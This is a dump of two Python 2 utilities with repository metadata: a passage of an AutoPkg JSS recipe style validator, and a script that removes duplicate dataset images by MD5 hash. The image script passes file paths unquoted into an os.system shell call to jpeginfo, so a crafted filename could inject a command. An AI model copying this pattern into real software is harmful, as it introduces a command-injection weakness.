test_scripts,
test_icon,
test_lint)
header = " Testing recipe: %s " % recipe_path
print_bar(len(header))
print header
print_bar(len(header))
if os.path.exists(recipe_path):
recipe = get_recipe(recipe_path)
else:
print "File not found."
sys.exit(1)
results = Results()
for test in tests:
try:
result = test(recipe)
# Handle missing plist keys rather than try to test for each
# bit of a recipe.
except KeyError as err:
result = (False, "'%s' failed with missing key: '%s'" %
(test.__name__, err.message))
except AttributeError as err:
result = (False, "'%s' failed with missing attribute" %
test.__name__)
results.add_result(result)
if verbose:
results.report_all()
else:
results.report()
def get_recipe(recipe_path):
"""Open a recipe file as an ElementTree.
Args:
recipe_path: String path to recipe file.
Returns:
        Plist of the recipe, an exception message if the recipe has parsing
        errors, or None if the file does not exist.
"""
try:
recipe = Plist(recipe_path)
except IOError:
recipe = None
except PlistParseError as err:
recipe = err.message
except ValueError:
recipe = u"File does not exist."
return recipe
def test_filename_prefix(recipe):
"""Tests filename for correct prefix.
Args:
recipe_path: String path to a recipe file.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
name = recipe["Input"].get("NAME")
result = os.path.basename(recipe.filename).startswith(name)
description = "Recipe has correct prefix (NAME: '%s')" % name
return (result, description)
def test_filename_suffix(recipe):
"""Tests filename for correct ending.
Args:
recipe_path: String path to a recipe file.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = os.path.basename(recipe.filename).endswith(".jss.recipe")
description = "Recipe has correct ending ('.jss.recipe')"
return (result, description)
def test_recipe_parsing(recipe):
"""Determine whether recipe file exists and parses.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe parses correctly."
if not recipe:
description += " (Recipe file not found!)"
elif isinstance(recipe, unicode):
# There was a parsing error. Print the message and finish.
description += " (%s)" % recipe
else:
result = True
return (result, description)
def test_is_in_subfolder(recipe):
"""Determine whether recipe file is in a product subfolder.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
name = recipe["Input"].get("NAME")
description = "Recipe is in a subfolder named (NAME: '%s')." % name
dirname = os.path.dirname(recipe.filename).rsplit("/", 1)[1]
result = dirname == name
return (result, description)
def test_folder_contents_have_common_prefix(recipe):
"""Determine whether folder contents have a common prefix of NAME.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
name = recipe["Input"].get("NAME")
description = "All files have prefix of product (NAME: '%s')." % name
files = os.listdir(os.path.dirname(recipe.filename))
result = all((filename.startswith(name) or filename == ".DS_Store"
for filename in files))
return (result, description)
def test_no_restricted_files_in_folder(recipe):
"""Determine whether folder contents have a common prefix of NAME.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
restricted_files = ["PolicyTemplate.xml", "SmartGroupTemplate.xml"]
description = ("None of the restricted templates %s are in recipe's "
"folder." % restricted_files)
files = os.listdir(os.path.dirname(recipe.filename))
result = all(restricted_file not in files for restricted_file in
restricted_files)
return (result, description)
def test_parent_recipe(recipe):
"""Determine whether parent recipe is in AutoPkg org and not None.
Uses a GitHub personal access token if one has been generated.
This is helpful if you're validating a bunch of recipes at once and
hitting the rate limit.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
parent = recipe.get("ParentRecipe")
result = False
description = "Parent Recipe is in AutoPkg org."
if parent:
cmd = ["autopkg", "search", parent]
if os.path.exists(os.path.expanduser("~/.autopkg_gh_token")):
cmd.insert(2, "--use-token")
search_results = subprocess.check_output(cmd)
expected_parents = (".pkg.recipe", ".download.recipe")
if any(exp_par in search_results for exp_par in expected_parents):
info_process = subprocess.Popen(["autopkg", "info", parent],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Send an "n" in case it didn't find anything.
info_results = info_process.communicate("n")
if "Didn't find a recipe for" in info_results[0]:
description += (" (ParentRecipe repo not available. Add and "
"retry.)")
else:
# Assume that since it found something, it's good.
result = True
else:
description += " (ParentRecipe not set.)"
return (result, description)
def test_identifier(recipe):
"""Test recipe identifier for proper construction.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
name = recipe["Input"].get("NAME")
if name:
# The identifier may not have spaces.
name = name.replace(" ", "")
description = ("Recipe identifier follows convention. "
"('com.github.jss-recipes.jss.%s')" % name)
result = False
identifier = recipe.get("Identifier")
if identifier and name:
if (str(identifier).startswith("com.github.jss-recipes.jss.") and
str(identifier).rsplit(".", 1)[1].startswith(name)):
result = True
return (result, description)
def test_single_processor(recipe):
"""Test for recipe having a single processor.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
description = "Recipe has only a single processor, of type 'JSSImporter'."
result = False
processors = recipe.get("Process")
if len(processors) == 1:
processor = processors[0].get("Processor")
if processor and processor == "JSSImporter":
result = True
else:
description += " (Processor is not 'JSSImporter')"
else:
description += " (Too many processors: %s > 1)" % len(processors)
return (result, description)
def get_jssimporter(recipe):
"""Return the JSSImporter processor section or None."""
processors = [processor for processor in recipe["Process"] if
processor.get("Processor") == "JSSImporter"]
if len(processors) == 1:
result = processors.pop()
else:
result = None
return result
def test_argument_values(recipe):
"""Test for all arguments to JSSImporter being replacement vars.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = ("All required and optional arguments to JSSImporter are "
"%ALL_CAPS% replacement variables, and are present.")
required_argument_values = (get_jssimporter(recipe)["Arguments"].get(
argument) for argument in REQUIRED_ARGUMENTS)
optional_argument_values = (get_jssimporter(recipe)["Arguments"].get(
argument) for argument in OPTIONAL_ARGUMENTS)
valid_required_values = all((val and val.isupper() and val.startswith("%")
and val.endswith("%") for val in
required_argument_values))
    valid_optional_values = all((val.isupper() and val.startswith("%") and
                                 val.endswith("%") for val in
                                 optional_argument_values if val))
if valid_required_values and valid_optional_values:
result = True
return (result, description)
def test_name_prod_name(recipe):
"""Test for name Input and prod_name arg.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "NAME is set, and prod_name is %NAME%."
if ("NAME" in recipe["Input"] and
get_jssimporter(recipe)["Arguments"].get("prod_name") == "%NAME%"):
result = True
return (result, description)
def test_no_prohibited_arguments(recipe):
"""Tests for prohibited arguments.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "No prohibited arguments."
arguments = get_jssimporter(recipe)["Arguments"]
if all((not prohibited_arg in arguments for prohibited_arg in
PROHIBITED_ARGUMENTS)):
result = True
return (result, description)
def test_input_section(recipe):
"""Test for all required and optional args in input section.
All args should have actual values set in input section. Also,
names must follow the convention of being ALL_CAPS equivalent of
JSSImporter argument.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = ("All required and optional arguments to JSSImporter are "
"set in 'Input' section with ALL_CAPS keys.")
required_input_keys = (recipe["Input"].get(argument.upper()) for argument
in REQUIRED_ARGUMENTS)
# Optional key must be present in JSSImporter args also!
optional_input_keys = (recipe["Input"].get(argument.upper()) for argument
in OPTIONAL_ARGUMENTS if
get_jssimporter(recipe)["Arguments"].get(argument))
valid_required_keys = all((key is not None for key in required_input_keys))
valid_optional_keys = all((key is not None for key in optional_input_keys))
if valid_required_keys and valid_optional_keys:
result = True
return (result, description)
def test_category_value(recipe):
"""Test for valid category.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "CATEGORY is in approved list."
result = recipe["Input"].get("CATEGORY") in VALID_CATEGORIES
return (result, description)
def test_policy_category_value(recipe):
"""Test that policy category is Testing.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "POLICY_CATEGORY is 'Testing'."
result = (recipe["Input"].get("POLICY_CATEGORY") == "Testing")
return (result, description)
def test_policy_template_value(recipe):
"""Test that policy template is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "POLICY_TEMPLATE is 'PolicyTemplate.xml'."
result = recipe["Input"].get("POLICY_TEMPLATE") == "PolicyTemplate.xml"
return (result, description)
def test_icon_name(recipe):
"""Test that icon name is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "SELF_SERVICE_ICON name is NAME.png or %NAME%.png."
result = (recipe["Input"].get("SELF_SERVICE_ICON") in
(recipe["Input"].get("NAME") + ".png",
"%NAME%.png"))
return (result, description)
def test_group_name(recipe):
"""Test that group name is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "GROUP_NAME is '%NAME%-update-smart'."
result = recipe["Input"].get("GROUP_NAME") == "%NAME%-update-smart"
return (result, description)
def test_group_template(recipe):
"""Test that group template is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
required_template = "SmartGroupTemplate.xml"
cfbundletemplate = "CFBundleVersionSmartGroupTemplate.xml"
description = "GROUP_TEMPLATE is '%s'." % required_template
name = recipe["Input"].get("NAME")
group_template = recipe["Input"].get("GROUP_TEMPLATE")
if group_template == required_template:
result = True
else:
# Check to see if there is an extension attribute, requiring a
# custom group template.
has_ext_attrs = get_jssimporter(recipe)["Arguments"].get(
"extension_attributes")
if has_ext_attrs and group_template in [name + required_template,
cfbundletemplate]:
result = True
description = ("GROUP_TEMPLATE is '%s' (Properly formed "
"extension-attribute-supporting smart group "
"template provided." % (name + required_template))
return (result, description)
def test_groups_argument(recipe):
"""Test that groups argument is as specified in style-guide.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "'groups' argument to JSSImporter is correct."
groups_args = get_jssimporter(recipe)["Arguments"]["groups"]
groups_len_compliant = len(groups_args) == 1
if groups_len_compliant:
group = groups_args[0]
group_name_compliant = group["name"] == "%GROUP_NAME%"
group_smart_compliant = group["smart"] == True
group_template_compliant = group["template_path"] == "%GROUP_TEMPLATE%"
if all((group_name_compliant, group_smart_compliant,
group_template_compliant)):
result = True
return (result, description)
def test_extension_attributes(recipe):
"""Determine whether extension attributes are configured.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe has no extension attributes."
extension_attributes = get_jssimporter(
recipe)["Arguments"].get("extension_attributes")
if not extension_attributes:
result = True
else:
description += (" (WARNING: Extension attributes only allowed when "
"absolutely necessary.")
result, description = test_extension_attribute_arguments(recipe)
return (result, description)
def test_extension_attribute_arguments(recipe):
"""Determine whether extension attributes are configured correctly.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
name = recipe["Input"].get("NAME")
description = ("WARNING: Recipe has extension attributes. Extension "
"attributes meet style guidelines.")
extension_attributes = get_jssimporter(
recipe)["Arguments"].get("extension_attributes")
ext_attr_templates = [ext_attr.get("ext_attribute_path") for ext_attr in
extension_attributes if
ext_attr.get("ext_attribute_path") not in
ALLOWED_EXTENSION_ATTRIBUTES]
template_names_compliant = all((filename.startswith(name) and
filename.endswith("ExtensionAttribute.xml")
for filename in ext_attr_templates))
directory = os.path.dirname(recipe.filename)
templates_exist = all((os.path.isfile(os.path.join(directory, filename))
for filename in ext_attr_templates))
result = template_names_compliant and templates_exist
return (result, description)
def test_scripts(recipe):
"""Determine whether scripts are configured.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe has no scripts."
scripts = get_jssimporter(
recipe)["Arguments"].get("scripts")
if not scripts:
result = True
else:
description += (" (WARNING: Scripts only allowed when absolutely "
"necessary.")
result, description = test_scripts_arguments(recipe)
return (result, description)
def test_scripts_arguments(recipe):
"""Determine whether scripts are configured correctly.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
name = recipe["Input"].get("NAME")
description = ("WARNING: Recipe has scripts. Scripts arguments meet "
"style guidelines.")
scripts = get_jssimporter(recipe)["Arguments"].get("scripts")
script_templates = [script.get("template_path") for script in scripts]
template_names_compliant = all((filename.startswith(name) and
filename.endswith("ScriptTemplate.xml") for
filename in script_templates))
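# e.g. with NAME "Firefox", a compliant script template filename
# (illustrative) would be "FirefoxScriptTemplate.xml".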
directory = os.path.dirname(recipe.filename)
templates_exist = all((os.path.isfile(os.path.join(directory, filename))
for filename in script_templates))
script_names = [script.get("name") for script in scripts]
script_names_compliant = all((filename.startswith(name) for filename in
script_names))
result = (template_names_compliant and templates_exist and
script_names_compliant)
return (result, description)
def test_icon(recipe):
"""Determine whether recipe file exists and parses.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
allowed_dimensions = (128, 300)
result = False
description = "Icon is a 128x128px PNG file."
directory = os.path.dirname(recipe.filename)
icon_filename = recipe["Input"].get("SELF_SERVICE_ICON")
if icon_filename == "%NAME%.png":
icon_filename = "%s.png" % recipe["Input"].get("NAME")
icon_path = os.path.join(directory, icon_filename)
if os.path.exists(icon_path):
width, height, format = get_image_properties(icon_path)
if (width in allowed_dimensions and height == width and
format.upper() == "PNG"):
result = True
else:
description += " (Image is %ix%i of type %s)" % (width, height,
format)
else:
description += " (Icon not found)"
return (result, description)
def get_image_properties(path):
"""Get the width, height, and format of an image using sips.
Args:
path: String path to image file.
Returns:
Tuple of (int: width, int: height, and string: image format)
"""
args = ["/usr/bin/sips", "-g", "pixelWidth", "-g", "pixelHeight", "-g",
"format", path]
output = subprocess.check_output(args).splitlines()
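# sips prints a header line with the file path, then one "key: value"
# line per queried property, roughly (illustrative):
#   /path/to/icon.png
#     pixelWidth: 128
#     pixelHeight: 128
#     format: png
# hence the index-based parsing below.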
width = int(output[1].rsplit()[-1])
height = int(output[2].rsplit()[-1])
format = output[3].rsplit()[-1]
return width, height, format
def test_lint(recipe):
"""Determine whether recipe file lints.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe file passes plutil -lint test."
args = ["/usr/bin/plutil", "-lint", recipe.filename]
output = subprocess.check_output(args)
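# plutil -lint prints "<path>: OK" for a valid plist, so a trailing
# token of "OK" signals success.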
if output.rsplit()[-1] == "OK":
result = True
return (result, description)
def print_bar(length=79):
"""Print a line of '-'s."""
print length * "-"
def main():
parser = get_argument_parser()
args = parser.parse_args()
for recipes_arg in args.recipe:
recipes = get_recipes(recipes_arg)
for recipe in recipes:
validate_recipe(recipe, args.verbose)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b733ea8133fef7f09f21b15c9685e7e52dd55c44
|
eecef46270f30ca7aa37e91da29535051ece8912
|
/tensorflow/tensorflow_tools/data_prepocess_tools/md5_compare.py
|
a70a69f076286c902298e0d803264d048e2b590b
|
[
"Apache-2.0"
] |
permissive
|
bowen9799/cuisine-detection
|
c1680153b8102207bf64fb9c1b527291d552cb23
|
c805e82b1d13aede835b5ffb4713addf9dd4f5ec
|
refs/heads/master
| 2020-03-19T13:40:48.881447 | 2018-06-12T23:50:29 | 2018-06-12T23:50:29 | 136,590,148 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,269 |
py
|
# -*- coding: utf-8 -*-
import os
#import cv2
import shutil
import sys,md5
import numpy as np
#from matplotlib import pyplot as plt
#from pdb import set_trace
import click
reload(sys)
sys.setdefaultencoding('utf-8')
def classify_gray_hist(hist1,hist2):
degree = 0
for i in range(len(hist1)):
if hist1[i] != hist2[i]:
degree = degree + (1 - float(abs(hist1[i]-hist2[i]))/max(hist1[i],hist2[i]))
else:
degree = degree + 1
degree = degree/len(hist1)
return degree
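# Worked example (illustrative): for hist1 = [4, 2] and hist2 = [2, 2],
# the per-bin scores are 1 - |4 - 2| / 4 = 0.5 and 1.0, so the returned
# similarity degree is (0.5 + 1.0) / 2 = 0.75; identical histograms
# score 1.0. The float() above guards against Python 2 integer division.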
def scan_folder(path,s):
files = os.listdir(path)  # get every file name under the folder
for file in files:  # walk the folder contents
file_path = os.path.join(path, file)
if not os.path.isdir(file_path):  # only process regular files; directories recurse below
# use jpeginfo to check jpg image first.
jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n'
#print "jpgpath %s"%(jpgcheck)
#sys.stdout.write('\n')
#sys.stdout.flush()
os.system(jpgcheck)
if os.path.isfile(file_path):
f1 = open(file_path, 'rb')  # read bytes so the MD5 is platform-safe
md5_value = md5.new(f1.read()).digest()
f1.close()
s.append([file_path, md5_value])
else:
print "%s is deleted\n"%(file_path)
else:
scan_folder(file_path,s)
return s
def scan_folder_and_remove_same(path):
s=[]
files = os.listdir(path)  # get every file name under the folder
for file in files:  # walk the folder contents
file_path = os.path.join(path, file)
if not os.path.isdir(file_path):  # only process regular files; directories recurse below
if False:
# use jpeginfo to check jpg image first.
jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n'
os.system(jpgcheck)
if os.path.isfile(file_path):
f1 = open(file_path, 'rb')  # read bytes so the MD5 is platform-safe
md5_value = md5.new(f1.read()).digest()
f1.close()
if md5_value in s :
os.remove(file_path)
else:
s.append(md5_value)
#change file houzhui
if os.path.splitext(file_path)[1] != ".jpg":
newname = os.path.splitext(file_path)[0]+".jpg" # new extension to apply
os.rename(file_path,newname)
else:
print "%s is deleted\n"%(file_path)
else:
f1 = open(file_path, 'rb')  # read bytes so the MD5 is platform-safe
md5_value = md5.new(f1.read()).digest()
f1.close()
if md5_value in s :
os.remove(file_path)
else:
s.append(md5_value)
else:
scan_folder_and_remove_same(file_path)
return s
def mymovefile(srcfile,dstfile):
if not os.path.isfile(srcfile):
print "%s not exist!"%(srcfile)
else:
fpath, fname = os.path.split(dstfile)  # split into directory and filename
if not os.path.exists(fpath):
os.makedirs(fpath)  # create the destination directory
shutil.move(srcfile, dstfile)  # move the file
print "move %s -> %s"%( srcfile,dstfile)
def compare_and_move(path, compared_path):
file_list = []
scan_folder(path,file_list)
s_images = []
print(path)
for i in range(len(file_list)-1):
#print(i)
for j in range(i+1,len(file_list)):
if file_list[i][1]==file_list[j][1]:
s_images.append(file_list[j][0])
print(file_list[i][0],file_list[j][0])
s_images_path = list(set(s_images))  # de-duplicate repeated matches
for s_image_path in s_images_path:
s_image = s_image_path.split("/")[-1]
mymovefile(s_image_path, compared_path + "/" + s_image)
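# Note: the pairwise comparison above is O(n^2) in the number of files;
# a dict keyed by MD5 digest would find the same duplicates in one pass.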
def compare_and_delete(path):
scan_folder_and_remove_same(path)
@click.command()
@click.option('--input_dir', default='./food_classify', help='root path of image folder')
#@click.option('--same_data_dir', default='./food_same', help='file search pattern for glob')
#def main(input_dir, same_data_dir):
#compare_and_move(input_dir,same_data_dir)
def main(input_dir):
compare_and_delete(input_dir)
if __name__ == '__main__':
main()
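# Example invocation (assuming this file is saved as md5_compare.py):
#   python md5_compare.py --input_dir ./food_classify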
|
[
"[email protected]"
] |